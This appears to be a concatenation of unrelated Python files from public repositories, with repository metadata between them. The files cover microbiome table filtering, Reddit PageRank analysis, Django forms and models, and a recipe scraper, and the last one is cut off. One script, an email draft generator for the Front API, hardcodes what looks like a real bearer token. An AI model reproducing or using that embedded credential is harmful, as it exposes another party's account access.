            print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" could not be reduced to the given list."

if args.strRemoveMetadata:
    lsMetadata = args.strRemoveMetadata.split(",")
    for abndTable in lsTables:
        fResult = abndTable.funcRemoveSamplesByMetadata(sMetadata=lsMetadata[0], lValuesToRemove=lsMetadata[1:])
        if fResult:
            print "ManipulateTable::"+abndTable.funcGetName()+" has had samples removed and now has "+str(len(abndTable.funcGetSampleNames()))+" samples."
        else:
            print "ManipulateTable::ERROR. Could not remove samples from "+abndTable.funcGetName()+"."

# Normalize if needed
if args.fNormalize:
    for abndTable in lsTables:
        fResult = abndTable.funcNormalize()
        if fResult:
            print "ManipulateTable::"+abndTable.funcGetName()+" was normalized."
        else:
            print "ManipulateTable::"+abndTable.funcGetName()+" was NOT normalized."

# Filter on percentile
if args.strFilterPercentile:
    dPercentile,dPercentage = args.strFilterPercentile.split(",")
    for abndTable in lsTables:
        if abndTable.funcIsNormalized():
            fResult = abndTable.funcFilterAbundanceByPercentile(dPercentileCutOff = float(dPercentile), dPercentageAbovePercentile = float(dPercentage))
            if fResult:
                print "ManipulateTable::"+abndTable.funcGetName()+" has been reduced by percentile and now has "+str(len(abndTable.funcGetFeatureNames()))+" features."
            else:
                print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" could not be reduced by percentile."
        else:
            print "ManipulateTable::"+abndTable.funcGetName()+" was NOT normalized and so the percentile filter is invalid; please indicate to normalize the table."

# Filter on abundance (should go after the filter on percentile because the filter
# on percentile needs the full distribution of features in a sample).
if args.strFilterAbundance:
    dAbundance,iMinSamples = args.strFilterAbundance.split(",")
    dAbundance = float(dAbundance)
    iMinSamples = int(iMinSamples)
    for abndTable in lsTables:
        if abndTable.funcIsNormalized():
            fResult = abndTable.funcFilterAbundanceByMinValue(dMinAbundance=dAbundance,iMinSamples=iMinSamples)
            if fResult:
                print "ManipulateTable::"+abndTable.funcGetName()+" has been reduced by minimum relative abundance value and now has "+str(len(abndTable.funcGetFeatureNames()))+" features."
            else:
                print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" could not be reduced by minimum abundance."
        else:
            print "ManipulateTable::"+abndTable.funcGetName()+" was NOT normalized and so the abundance filter is invalid; please indicate to normalize the table."

#if args.dCuttOff:
#    print "Standard deviation filtering not completed"
#    for abndTable in lsTables:
#        abndTable.funcFilterFeatureBySD(dMinSDCuttOff=args.dCuttOff)
#        if fResult:
#            print "ManipulateTable::"+abndTable.funcGetName()+" has been reduced by standard deviation and now has "+str(len(abndTable.funcGetFeatureNames()))+" features."
#        else:
#            print "ManipulateTable::ERROR. "+abndTable.funcGetName()+" could not be reduced by standard deviation."

# Need to normalize again after abundance data filtering given removing features breaks the normalization.
# This happens twice because normalization is required to make the abundance data to filter on ;-)
# Normalize if needed
if args.fNormalize:
    for abndTable in lsTables:
        fResult = abndTable.funcNormalize()
        if fResult:
            print "ManipulateTable::"+abndTable.funcGetName()+" was normalized after filtering on abundance data."

#Manipulate lineage
if args.fPrefixClades:
    for abndTable in lsTables:
        fResult = abndTable.funcAddCladePrefixToFeatures()
        if fResult:
            print "ManipulateTable::Clade Prefix was added to "+abndTable.funcGetName()
        else:
            print "ManipulateTable::ERROR. Clade Prefix was NOT added to "+abndTable.funcGetName()

# Reduce dimensionality
if args.fDoPCA:
    pcaCur = PCA()
    for abndTable in lsTables:
        # Add data features
        # Make data components and add to abundance table
        pcaCur.loadData(abndTable, True)
        pcaCur.run()
        ldVariance = pcaCur.getVariance()
        lldComponents = pcaCur.getComponents()
        # Make Names
        lsNamesData = ["Data_PC"+str((tpleVariance[0]+1))+"_"+re.sub("[\.|-]","_",str(tpleVariance[1])) for tpleVariance in enumerate(ldVariance)]
        abndTable.funcAddDataFeature(lsNamesData, lldComponents)

        # Add metadata features
        # Convert metadata to an input for PCA
        dictMetadata = abndTable.funcGetMetadataCopy()
        ## Remove the metadata id
        dictMetadata.pop(abndTable.funcGetIDMetadataName(), None)
        lMetadata = []
        for lxItem in dictMetadata.values():
            # Replace NAs with the mode
            dictFreq = {}
            for xItem in lxItem:
                if not xItem.strip().lower() in ["na",""]:
                    dictFreq[xItem] = dictFreq.get(xItem,0)+1
            xCurMode = max((v, k) for k, v in dictFreq.iteritems())[1]
            lxItem = [xCurMode if xItem.strip().lower() in ["na",""] else xItem.strip() for xItem in lxItem]
            ## Keep only numeric metadata
            if sum([ValidateData.funcIsValidStringFloat(xItem) for xItem in lxItem]) == len(lxItem):
                lMetadata.append([float(xItem) for xItem in lxItem])
        pcaCur.loadData(np.array(lMetadata).T, False)
        pcaCur.run()
        ldVariance = pcaCur.getVariance()
        lldComponents = pcaCur.getComponents()
        # Make Names
        lsNamesMetadata = ["Metadata_PC"+str((tpleVariance[0]+1))+"_"+re.sub("[\.|-]","_",str(tpleVariance[1])) for tpleVariance in enumerate(ldVariance)]
        # Make metadata components and add to abundance
        llsMetadata = [list(npdRow) for npdRow in lldComponents]
        abndTable.funcAddMetadataFeature(lsNamesMetadata, llsMetadata)

#Manipulate based on metadata
if args.strStratifyBy:
    labndStratifiedTables = []
    for abndTable in lsTables:
        labndResult = abndTable.funcStratifyByMetadata(strMetadata=args.strStratifyBy)
        print "ManipulateTable::"+abndTable.funcGetName()+" was stratified by "+args.strStratifyBy+" into "+str(len(labndResult))+" tables."
        labndStratifiedTables.extend(labndResult)
    lsTables = labndStratifiedTables

if len(lsTables) == 1:
    lsTables[0].funcWriteToFile(args.strOutFile)
else:
    iIndex = 1
    for abndManTable in lsTables:
        abndManTable.funcWriteToFile(lsPieces[0]+str(iIndex)+lsPieces[1])
        iIndex = iIndex + 1
| ["rschwager-hsph@localhost"] | rschwager-hsph@localhost |

5f81cab976c891e02f4f7d4c3ecc56b284fbe8a0 | 8ebe7adab3daf5fd739970c9da9456f8f122a941 | /Data-Science_hw3/hw3/reddit_sparse.py | 49bd3827d35b8f7e0105b02d9aba1ac28570c7df | [] | no_license | tsenggordon/Data-Science | f497c999cbe7a03b5209e4b107241f2fd1dbad43 | 78905ae22d54dd6f036f3991a5a9b17b09595954 | refs/heads/master | 2021-01-21T13:04:21.158521 | 2016-05-19T14:55:52 | 2016-05-19T14:55:52 | 53,210,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,168 | py |
import csv
import numpy as np
from collections import defaultdict
from multiprocessing import Pool
import pickle
import os
import networkx as nx
from scipy.sparse import csr_matrix, vstack

FILE = "reddit_sort_200k.csv"
#FILE = "reddit_100000.csv"
#FILE = "reddit_50000.csv"


def build_dict():
    post_dict = {}
    author_dict = {}
    comment_dict = defaultdict(set)
    post_author_dict = defaultdict(int)
    post_subauthor_dict = defaultdict(set)
    post_count = 0
    author_count = 0
    with open(FILE) as f:
        reader = csv.reader(f)
        reader.next()
        for row in reader:
            author, po_id = row[0], row[1]
            head, post_id = po_id.split("_")
            if post_id not in post_dict:
                post_dict[post_id] = post_count
                post_count += 1
            if author not in author_dict:
                author_dict[author] = author_count
                author_count += 1
            comment_dict[author_dict[author]].add(post_dict[post_id])
            if head == "t3":  # means it is the top post
                post_author_dict[post_dict[post_id]] = author_dict[author]
                post_subauthor_dict[post_dict[post_id]].add(author_dict[author])
            else:
                post_subauthor_dict[post_dict[post_id]].add(author_dict[author])
    return post_dict, author_dict, comment_dict, post_author_dict, post_subauthor_dict


def doWork(x):
    edgelist = defaultdict(set)
    start_idx, end_idx = x
    work = end_idx - start_idx
    work_100 = work/100
    print "doWork start from", start_idx
    part_score = None
    for i in xrange(start_idx, end_idx):
        #print i, start_idx, work/100
        if i % work_100 == 0:
            print i, (i-start_idx+1)/work_100, "%"
        #print i
        tmp_score = np.zeros((1, len(author_dict)))
        for j in xrange(len(author_dict)):
            #if len(comment_dict[i] & comment_dict[j]) > 0 and i != j:
            #print float(len(comment_dict[i] & comment_dict[j])) / len(comment_dict[i] | comment_dict[j])
            #print len(comment_dict[i] & comment_dict[j]), len(comment_dict[i] | comment_dict[j])
            #print comment_dict[i] & comment_dict[i]
            tmp_score[0, j] = float(len(comment_dict[i] & comment_dict[j])) / len(comment_dict[i] | comment_dict[j])
            if tmp_score[0, j] > 0 and i != j:
                edgelist[i].add(j)
        tmp_score_s = csr_matrix(tmp_score)
        if part_score is not None:
            part_score = vstack([part_score, tmp_score_s])
        else:
            part_score = tmp_score_s
    print edgelist
    return edgelist, part_score


def build_diredge_and_pagerank():
    dirG = nx.DiGraph()
    #print "direction"
    #print post_author_dict
    #print post_subauthor_dict
    totalkey = post_author_dict.keys() + post_subauthor_dict.keys()
    for key in totalkey:
        if (key not in post_author_dict) or (key not in post_subauthor_dict):
            continue
        actor1_key = post_author_dict[key]
        actor1 = rev_author_dict[actor1_key]
        actor2_key_list = post_subauthor_dict[key]
        if len(actor2_key_list) == 1:
            #print "damn"
            continue
        for actor_key in actor2_key_list:
            #print "cool"
            if actor1_key == actor_key:
                continue
            actor2 = rev_author_dict[actor_key]
            #print actor1, actor2
            dirG.add_edge(actor1, actor2)
    pr = nx.pagerank(dirG)
    sort_pr = sorted(pr.keys(), key=lambda x: pr[x], reverse=True)
    print sort_pr[:10]
    return pr


def pagerank(edgelist):
    G = nx.Graph()
    for actor1 in edgelist.keys():
        for actor2 in edgelist[actor1]:
            G.add_edge(rev_author_dict[actor1], rev_author_dict[actor2])
    pr = nx.pagerank(G)
    sort_pr = sorted(pr.keys(), key=lambda x: pr[x], reverse=True)
    print sort_pr[:10]
    return pr


def build_rev_dict(target):
    rev_dict = {}
    for key in target.keys():
        rev_dict[target[key]] = key
    return rev_dict


def joinDict(dictlist):
    totalkey = []
    for dictionay in dictlist:
        totalkey += dictionay.keys()
    totaldict = {}
    print totalkey
    for key in totalkey:
        newSet = set()
        for dictionay in dictlist:
            newSet = newSet | dictionay[key]
        totaldict[key] = newSet
    return totaldict


if not os.path.exists("dict.pickle"):
    print "building dict"
    post_dict, author_dict, comment_dict, post_author_dict, post_subauthor_dict = build_dict()
    rev_author_dict = build_rev_dict(author_dict)
    with open("dict.pickle", "w") as f:
        pickle.dump((post_dict, author_dict, comment_dict, post_author_dict, post_subauthor_dict, rev_author_dict), f)
    print "building dict: finished"
else:
    print "loading dict"
    with open("dict.pickle") as f:
        post_dict, author_dict, comment_dict, post_author_dict, post_subauthor_dict, rev_author_dict = pickle.load(f)
    print "loading dict: finished"

del post_dict

if not os.path.exists("jacc_score.pickle"):
    print "compute jacc_score"
    print len(author_dict)
    #jacc_score = csr_matrix((len(author_dict),len(author_dict)), dtype = np.float32).tolil()
    #jacc_score = np.zeros((len(author_dict), len(author_dict))).astype(np.float32)
    print "build pool"
    pool = Pool(5)
    #edgelist_list, score_list
    totallist = pool.map(doWork, [(0, int(len(author_dict)/4)),
                                  (int(len(author_dict)/4), int(len(author_dict)/4)*2),
                                  (int(len(author_dict)/4)*2, int(len(author_dict)/4)*3),
                                  (int(len(author_dict)/4)*3, len(author_dict))])
    print "Dict joining"
    edgelist_list = []
    score_list = []
    for edgelist, score in totallist:
        edgelist_list.append(edgelist)
        score_list.append(score)
    edgelist = joinDict(edgelist_list)
    jacc_score_s = None
    for score in score_list:
        if jacc_score_s is not None:
            jacc_score_s = vstack([jacc_score_s, score])  # fixed: vstack expects a list of blocks
        else:
            jacc_score_s = score
    pool.close()
    pool.join()
    print "transfer to sparse"
    print "compute jacc_score: saving pickle"
    with open("jacc_score.pickle", "w") as f:
        pickle.dump((jacc_score_s, edgelist), f)
    print edgelist
    print "compute jacc_score: finished"
else:
    print "loading jacc_score"
    with open("jacc_score.pickle") as f:
        jacc_score, edgelist = pickle.load(f)
    #jacc_score = jacc_score_s.todense()
    print "loading jacc_score: finished"

'''
for i in xrange(jacc_score.shape[0]):
    for j in xrange(jacc_score.shape[1]):
        if jacc_score[i,j] > 0:
            print "great"
'''

print "undirected Pagerank"
pr_un = pagerank(edgelist)
print "directed Pagerank"
pr_dir = build_diredge_and_pagerank()

'''
maxlen = 0
maxset = None
for key in comment_dict.keys():
    if len(comment_dict[key]) > maxlen:
        maxlen = len(comment_dict[key])
        maxset = comment_dict[key]
#print comment_dict
print maxlen
print maxset
'''
| ["kuoweitseng@gmail.com"] | kuoweitseng@gmail.com |

de4a7a14d2f6fe0113e855fbde0cf5395d6aedca | 51a80368dff80cb3d01ed19692575564f56da149 | /services/migrations/0007_auto_20201120_2213.py | e1631f54213c7bb3a8411a7c0c7b9e07ee5ee85b | [] | no_license | guilhermewebdev/acacia-api | 44986442c34223fce844fa30ed3623b76fc1e3fb | e33b07b024fe15dff16f76e2e2f530365f34dc54 | refs/heads/master | 2023-03-30T12:28:14.106408 | 2020-12-14T22:11:19 | 2020-12-14T22:11:19 | 353,794,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py |
# Generated by Django 3.1.3 on 2020-11-20 22:13

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('services', '0006_auto_20201120_2212'),
    ]

    operations = [
        migrations.AlterField(
            model_name='job',
            name='start_datetime',
            field=models.DateTimeField(),
        ),
    ]
| ["guilherme@localhost"] | guilherme@localhost |

8cddad5babfbce45fa0c363641d48e16b2c96d27 | a3ae61f362d6b2a50c552660df4a5123840948db | /config.py | 31d12ffa828f9262e7bdd65a249ee68b033d8c1e | [] | no_license | Puttipong1234/PYBOTT-TODOLIST-NOTIFY | dac2eab8e0575b505658f137c58d667392126aeb | ac2c0e03891af4044cad8d809109408bc9197fcc | refs/heads/master | 2022-12-16T02:17:52.700831 | 2020-08-29T08:52:14 | 2020-08-29T08:52:14 | 290,964,480 | 4 | 3 | null | null | null | null | UTF-8 | Python | false | false | 501 | py |
import os
spreadsheet_key = os.environ.get('SPREADSHEET_KEY') # setup env variable on heroku
service_account_key_file = os.environ.get('GOOGLE_APPLICATION_CREDENTIALS') # setup env variable on heroku
notify_token = os.environ.get('LINE_NOTIFY_TOKEN') # setup env variable on heroku
SPREADSHEET_LINK = os.environ.get('SPREADSHEET_LINK') # setup env variable on heroku
#ADDING BUILDPACK FOR GOOGLE SHEET IN SETTINGS
#https://github.com/gerywahyunugraha/heroku-google-application-credentials-buildpack
| ["Puttipong.lims@gmail.com"] | Puttipong.lims@gmail.com |

00b618cc879d52c09940ddfc10d81501d09b159e | 8a4c2ae24835d87670e9c9ab4ac32e4c85eeea5a | /generate_draft.py | 60415b3ebad930d4bf2b04bd31921a5ba7ca9d25 | [] | no_license | szou00/analytics_happydogs | 5bb5f9c57a24fff62824494456ed309e23eb1350 | 5673c5bf66e296591bd3833e9bcc75df482c48e4 | refs/heads/main | 2023-08-10T09:44:33.227764 | 2021-09-06T14:48:59 | 2021-09-06T14:48:59 | 387,914,522 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,394 | py |
"""Automatic Draft Generator

This script uses the Front API to review emails and draft replies with
response templates when necessary.

This script requires that `requests` be installed within the Python
environment you are running this script in.

This file can also be imported as a module and contains the following
functions:

    * tag_new_events: tags emails with new activity
    * review_tagged_conversations: review tagged emails
    * get_canned_response: retrieve a response template
    * create_draft: create a draft based on a response template
    * add_tag: add a tag to a conversation
    * remove_tag: remove a tag from a conversation
    * get_comments: retrieve comments from a conversation
    * save_current_run_time: save current time to a file
    * load_last_run_time: retrieve the last time the program was run
    * print_friendly_JSON_object: print JSON object in a friendly format
    * main: the main function of the script. Here, it tags new events, then it reviews tagged emails.

Warnings:
    To be filled

Author: Sharon Zou
"""

import requests
import json
import time
import datetime
import os.path
import socket

AUTO_REVIEWED = "tag_mmo1x"
AUTO_REVIEW_NEEDED = "tag_mmlvp"
BEARER_TOKEN = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzY29wZXMiOlsicHJpdmF0ZToqIl0sImlhdCI6MTYyNjk4MTM5NSwiaXNzIjoiZnJvbnQiLCJzdWIiOiJoYXBweV9kb2dzX255YyIsImp0aSI6IjBiNjJkNWMzYTRmMWExMzQifQ.IPviahR63lerU4f1zJmBZGkDTW1nA3GXy2zr_gGgVPU"


def print_friendly_JSON_object(JSON_object):
    """Prints a reader-friendly, formatted string of a JSON object.

    This lets us view events/conversations from Front in a much
    friendlier format.

    Args:
        JSON_object (JSON object): A JSON object from an API request

    Returns:
        None
    """
    formatted_string = json.dumps(JSON_object, sort_keys=True, indent=4)
    print(formatted_string)


def tag_new_events():
    """Tags emails that have new activity with 'AUTO-review-needed'.

    Every time the program runs, this tracks the new activities (such as comment or
    message received) and quickly flags them. We can only look at emails with a certain
    tag, so this is really helpful in letting us quickly go through emails that may need
    drafts generated.

    Args:
        None

    Returns:
        None
    """
    # Make API request to retrieve events after the last time the program ran
    time_of_last_run = (
        load_last_run_time().timestamp()
    )  # if never run before, it'll start looking at events now; do we want to do that or have it look at ALL events?
    url = (
        "https://api2.frontapp.com/events?q[types]=inbound&q[types]=comment&q[after]="
        + str(
            time_of_last_run - 60
        )  # subtracting one minute to compensate for lag on Front's end JUST in case
    )
    payload = {}
    headers = {"Authorization": BEARER_TOKEN}
    response = requests.request("GET", url, headers=headers, data=payload)
    events = response.json()["_results"]
    # For each new event, flag it with a tag
    for event in events:
        email = event["conversation"]
        convo_ID = email["id"]
        remove_tag(
            convo_ID, AUTO_REVIEWED
        )  # if the email was marked as AUTO-reviewed, untag it
        add_tag(convo_ID, AUTO_REVIEW_NEEDED)  # now add AUTO-review-needed tag
        print("Flagged:" + email["subject"])
    save_current_run_time()


def review_tagged_conversations():
    """Review conversations with 'AUTO-review-needed' tag.

    If applicable, drafts will be created for conversations
    that need them.

    Args:
        None

    Returns:
        None
    """
    # Makes API request to obtain all conversations with the tag that need to be reviewed
    url = "https://api2.frontapp.com/conversations/search/tag:" + AUTO_REVIEW_NEEDED
    payload = {}
    files = []
    headers = {"Authorization": BEARER_TOKEN}
    response = requests.request("GET", url, headers=headers, data=payload, files=files)
    # Obtain the emails that need to be reviewed and possibly create drafts
    emails = response.json()["_results"]
    for email in emails:
        convo_ID = email["id"]
        for tag in email["tags"]:
            # CREATE DRAFT HERE
            if (
                tag["name"] == "example-tag"
            ):  # simple example of draft being created based on a tag
                create_draft(convo_ID, "rsp_3rd8l")
        get_comments(convo_ID)  # placeholder
        remove_tag(convo_ID, AUTO_REVIEW_NEEDED)  # removes AUTO-review-needed tag
        add_tag(convo_ID, AUTO_REVIEWED)  # adds AUTO-reviewed tag
        print("Reviewed:" + email["subject"])


def get_canned_response(template_ID):
    """Retrieves message template.

    Helper function for create_draft().

    Args:
        template_ID (str): The ID of the response template

    Returns:
        response_template.json() (JSON object): Details of the response template
    """
    # Make API request to retrieve message template from Front API based on its ID
    url = "https://api2.frontapp.com/responses/" + template_ID
    payload = {}
    files = []
    headers = {"Authorization": BEARER_TOKEN}
    response_template = requests.request(
        "GET", url, headers=headers, data=payload, files=files
    )
    return response_template.json()


def create_draft(convo_ID, template_ID):
    """Drafts a reply accordingly using a response template.

    Args:
        convo_ID (str): ID of the conversation to reply to
        template_ID (str): ID of response template

    Returns:
        None
    """
    # Get response template through helper function.
    # Make an API request to reply to a conversation with the content in that template
    response_template = get_canned_response(template_ID)
    url = "https://api2.frontapp.com/conversations/" + convo_ID + "/drafts"
    payload = {
        "body": response_template["body"],
        "subject": response_template["subject"],
        "author_id": "tea_188ud",  # [needs to change later on]
        "channel_id": "cha_14tfp",  # [also will need to be changed for team based settings]
    }
    files = []
    headers = {"Authorization": BEARER_TOKEN}
    requests.request("POST", url, headers=headers, json=payload, files=files)


def add_tag(convo_ID, tag_ID):
    """Add tag to a conversation.

    Args:
        convo_ID (str): ID of the conversation
        tag_ID (str): ID of the tag to add

    Returns:
        None
    """
    # Make API request
    url = "https://api2.frontapp.com/conversations/" + convo_ID + "/tags"
    payload = json.dumps({"tag_ids": [tag_ID]})
    headers = {"Authorization": BEARER_TOKEN, "Content-Type": "application/json"}
    requests.request("POST", url, headers=headers, data=payload)


def remove_tag(convo_ID, tag_ID):
    """Removes tags from a conversation.

    Args:
        convo_ID (str): ID of the conversation
        tag_ID (str): ID of the tag to remove

    Returns:
        None
    """
    # Make API request
    url = "https://api2.frontapp.com/conversations/" + convo_ID + "/tags"
    payload = json.dumps({"tag_ids": [tag_ID]})
    headers = {"Authorization": BEARER_TOKEN, "Content-Type": "application/json"}
    requests.request("DELETE", url, headers=headers, data=payload)


def get_comments(convo_ID):
    """Retrieves comments from a given conversation.

    This is a useful function to help decide which draft template to use.

    Args:
        convo_ID (str): ID of the conversation

    Returns:
        None
    """
    # Make API request
    url = "https://api2.frontapp.com/conversations/" + convo_ID + "/comments"
    payload = {}
    headers = {"Authorization": BEARER_TOKEN}
    response = requests.request("GET", url, headers=headers, data=payload)
    for comment in response.json()["_results"]:
        # For each comment in Front, print out its message
        print_friendly_JSON_object(comment["body"])


def save_current_run_time():
    """Writes the current time to a file.

    Args:
        None

    Returns:
        None
    """
    # path = "/Users/szou/Downloads/bu/happydogs/analytics_happydogs/last_time_run"  # hard coding this due to CRON, but will remove later
    output_file = open("last_time_run", "w")
    current_time_string = datetime.datetime.strftime(
        datetime.datetime.now(), "%Y-%m-%d %H:%M:%S"
    )
    output_file.write(current_time_string)
    print(current_time_string)
    output_file.close()


def load_last_run_time():
    """Retrieves the last time the program was run from the file.

    This helps increase efficiency by bypassing events that were already looked at.

    Args:
        None

    Returns:
        None
    """
    # path = "/Users/szou/Downloads/bu/happydogs/analytics_happydogs/last_time_run"
    if os.path.isfile("last_time_run"):
        # If the file exists
        f = open("last_time_run", "r")
        last_run_time = datetime.datetime.strptime(f.read(), "%Y-%m-%d %H:%M:%S")
        f.close()
        return last_run_time
    save_current_run_time()
    # If file doesn't exist (possible if it's the first run), return current time
    return datetime.datetime.now()


def main():
    try:
        tag_new_events()
        print("\n")
        review_tagged_conversations()
    except socket.error:
        print("\nCan't connect to Front :(\n")
        exit(1)


if __name__ == "__main__":
    main()
| ["43053716+szou00@users.noreply.github.com"] | 43053716+szou00@users.noreply.github.com |

e3d2b3fd01e3d6198f590fe4025c072b285bccb5 | 64b731c4385be883e296f2347a4fb8fb3dcacee2 | /main/forms.py | ef7c3301c407f5eb2298676919449abcbcbf0efa | [] | no_license | Couragyn/spruceEditing | 136310ddf5d427ae6b19d1741bfe2ca6a479f1a4 | 6cc4b4bb2e7c8797f3aeed8bbd254af43d6c2e79 | refs/heads/master | 2023-04-16T16:14:43.076781 | 2021-05-04T17:22:01 | 2021-05-04T17:22:01 | 321,816,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,452 | py |
from django import forms
from captcha.fields import ReCaptchaField

quote_choices = [
    ('Academic Papers', 'Academic Papers'),
    ('Applications & Grants', 'Applications & Grants'),
    ('Cover letters & Resumes', 'Cover letters & Resumes'),
    ('Websites & Blogs', 'Websites & Blogs'),
    ('Newspaper & Magazine Articles', 'Newspaper & Magazine Articles'),
    ('Short- & Long-form Fiction', 'Short- & Long-form Fiction'),
    ('Short- & Long-form Creative Nonfiction', 'Short- & Long-form Creative Nonfiction'),
    ('Beta Reading', 'Beta Reading'),
    ("Children's Books", "Children's Books"),
    ("Other", "Other"),
]


class ContactForm(forms.Form):
    name = forms.CharField(max_length=80)
    email = forms.EmailField()
    phone = forms.CharField(max_length=15, required=False)
    message = forms.CharField(widget=forms.Textarea)
    attachments = forms.FileField(widget=forms.ClearableFileInput(attrs={'multiple': True}), required=False)
    captcha = ReCaptchaField()


class QuoteForm(forms.Form):
    name = forms.CharField(max_length=80)
    email = forms.EmailField()
    type_of_work = forms.MultipleChoiceField(
        required=False,
        widget=forms.CheckboxSelectMultiple,
        choices=quote_choices,
    )
    tell_us_about_your_document = forms.CharField(widget=forms.Textarea)
    documents = forms.FileField(widget=forms.ClearableFileInput(attrs={'multiple': True}), required=False)
    captcha = ReCaptchaField()
| ["couragyn@gmail.com"] | couragyn@gmail.com |

0113b4bc7587a885d3b38bcecbc777be4442adbd | f55a00d30e67c4eea0b425162140207984f3f9df | /app/demo/models.py | 2b796e3a7403b16f4f612ee41e792bed14ac1c23 | [] | no_license | andynguyenm/django-rest-api-sample | bbb89fa297f0e927eabe1cb0c0d9708ddae8dd48 | 746c1d03d5dc3c8488d64e5c01e23ce81fa257fd | refs/heads/develop | 2022-12-22T13:10:07.513141 | 2017-10-06T09:58:05 | 2017-10-06T09:58:05 | 105,881,245 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,062 | py |
from django.db import models
from django.db.models.signals import post_save
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
from django.dispatch import receiver

# Create your models here.


class BucketList(models.Model):
    """This class represents the bucketlist model."""
    name = models.CharField(max_length=255, blank=False, unique=True)
    owner = models.ForeignKey('auth.User',  # ADD THIS FIELD
                              related_name='bucketlists',
                              on_delete=models.CASCADE)
    date_created = models.DateTimeField(auto_now_add=True)
    date_modified = models.DateTimeField(auto_now=True)

    def __str__(self):
        """Return a human readable representation of the model instance."""
        return "{}".format(self.name)


# This receiver handles token creation immediately after a new user is created.
@receiver(post_save, sender=User)
def create_auth_token(sender, instance=None, created=False, **kwargs):
    if created:
        Token.objects.create(user=instance)
| ["nghianm@runsystem.net"] | nghianm@runsystem.net |

6a7758880e1dded0ce5cd0f706bd7b963afa65f2 | ab7a5fdc5375e63e2483ef29dfdb994b687da972 | /food2fork/__init__.py | af3b9e4485adf21d37a6f502eb787c1c48f578ab | ["MIT"] | permissive | mainrs/MLFoodPairing | 520d5442597215973d985434d366dddef88f8bd7 | 00d7b5b436328a08e98f0fd02143ed8755331a1e | refs/heads/master | 2023-03-28T10:18:33.752223 | 2018-05-01T06:41:13 | 2018-05-01T06:41:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,736 | py |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
.. module:: food2fork
.. moduleauthor:: Julien Spronck
.. created:: March 2018
'''
import json
import re
import pymongo
import requests
from bs4 import BeautifulSoup
from food2fork.config import FOOD2FORK_API_KEY
import food2fork.ingredient_parser as parser
import food2fork.scrapers as scrapers
__version__ = '1.0'
# Database connection
client = pymongo.MongoClient('mongodb://localhost:27017')
dbfood = client.food2forkDB.food2fork
def scrape_f2f_recipe(url):
'''Scrapes information from recipe web page
Args:
url (str): URL for the recipe
'''
info = {}
response = requests.get(url)
if response.status_code != 200:
return {}
soup = BeautifulSoup(response.text, "lxml")
# Get ingredient list
ingredients = soup.select('li[itemprop="ingredients"]')
# ingredients = [parser.get_ingredient_from_phrase(ingredient.text.strip())
# for ingredient in ingredients]
ingredients = [ingredient.text.strip() for ingredient in ingredients]
if ingredients:
info['raw_ingredients'] = ingredients
# Get social media stats
social = soup.select('div.social-info div.pull-left')
media = {}
for span in social:
match = re.search(r'(\d+)\s+(likes|tweets|plusses|pins|views)',
span.text.lower())
if match:
number = int(match.group(1))
network = match.group(2)
media[network] = number
if media:
info['media'] = media
# Get rank
rank = soup.select('div.rating span')
if rank:
info['social_rank'] = rank[0].text
# Get title
title = soup.select('h1.recipe-title')
if title:
info['title'] = title[0].text
# Get nutritional information
nutrition_rows = soup.select('table.nutrition tr')
nutrition = {}
for row in nutrition_rows:
match = re.search(r'^(\w[\w\s]*)\s+([\d\.]+m?g?)$',
row.text.strip().lower())
if match:
cat = match.group(1)
number = match.group(2)
nutrition[cat] = number
if nutrition:
info['nutrition'] = nutrition
return info
def scrape_original_recipe(url, publisher):
'''Scrapes information from original recipe web page
Args:
url (str): URL for the recipe
'''
scraping_dict = {
"All Recipes": scrapers.AllRecipes,
"101 Cookbooks": scrapers.OneOOneCookbooks,
"Simply Recipes": scrapers.SimplyRecipes,
"Two Peas and Their Pod": scrapers.TwoPeasAndTheirPod,
"The Pioneer Woman": scrapers.ThePioneerWoman,
"Closet Cooking": scrapers.ClosetCooking,
"Cookie and Kate": scrapers.CookieAndKate,
"Jamie Oliver": scrapers.JamieOliver,
"BBC Food": scrapers.BBC,
"BBC Good Food": scrapers.BBCGoodFood,
"Bon Appetit": scrapers.BonAppetit,
"Bunky Cooks": scrapers.BunkyCooks,
"Chow": scrapers.Chow,
"Cookin Canuck": scrapers.CookinCanuck,
"Epicurious": scrapers.Epicurious,
"Fine Dining Lovers": scrapers.FineDiningLovers,
"Healthy Delicious": scrapers.HealthyDelicious,
"My Baking Addiction": scrapers.MyBakingAddiction,
"Naturally Ella": scrapers.NaturallyElla,
"Steamy Kitchen": scrapers.SteamyKitchen,
"Tasty Kitchen": scrapers.TastyKitchen,
}
if publisher not in scraping_dict:
return {}
scraper_cls = scraping_dict[publisher]
scraper = scraper_cls(url)
return scraper.get_all_info()
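# For illustration (URL hypothetical): scrape_original_recipe(
#     'https://www.chow.com/recipes/12345', 'Chow') dispatches to scrapers.Chow
# and returns whatever that scraper's get_all_info() produces; publishers not
# present in scraping_dict fall through to the empty dict.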
def add_recipe_to_db(recipe):
'''Adds a recipe to the database
Args:
recipe (dict): dictionary with recipe data
'''
if dbfood.find_one({'recipe_id': recipe['recipe_id']}) is None:
dbfood.insert_one(recipe)
def get_api_data(page=0):
'''Retrieve data from the food2fork API
'''
url = 'http://food2fork.com/api/search'
params = {
'key': FOOD2FORK_API_KEY,
'page': page
}
response = requests.get(url, params=params)
if response.status_code != 200:
print(f'Bad HTTP request ({response.status_code})')
return
for j, recipe in enumerate(response.json()['recipes']):
print(f'Processing {j+1}/30')
if dbfood.find_one({'recipe_id': recipe['recipe_id']}) is not None:
continue
try:
# Add data from food2fork
info1 = scrape_f2f_recipe(recipe['f2f_url'])
for key, val in info1.items():
if key not in recipe:
recipe[key] = val
# Add data from publisher
info2 = scrape_original_recipe(recipe['source_url'],
recipe['publisher'])
for key, val in info2.items():
if key not in recipe:
recipe[key] = val
# Add recipe to database
add_recipe_to_db(recipe)
except (requests.TooManyRedirects, requests.ConnectionError):
continue
if __name__ == '__main__':
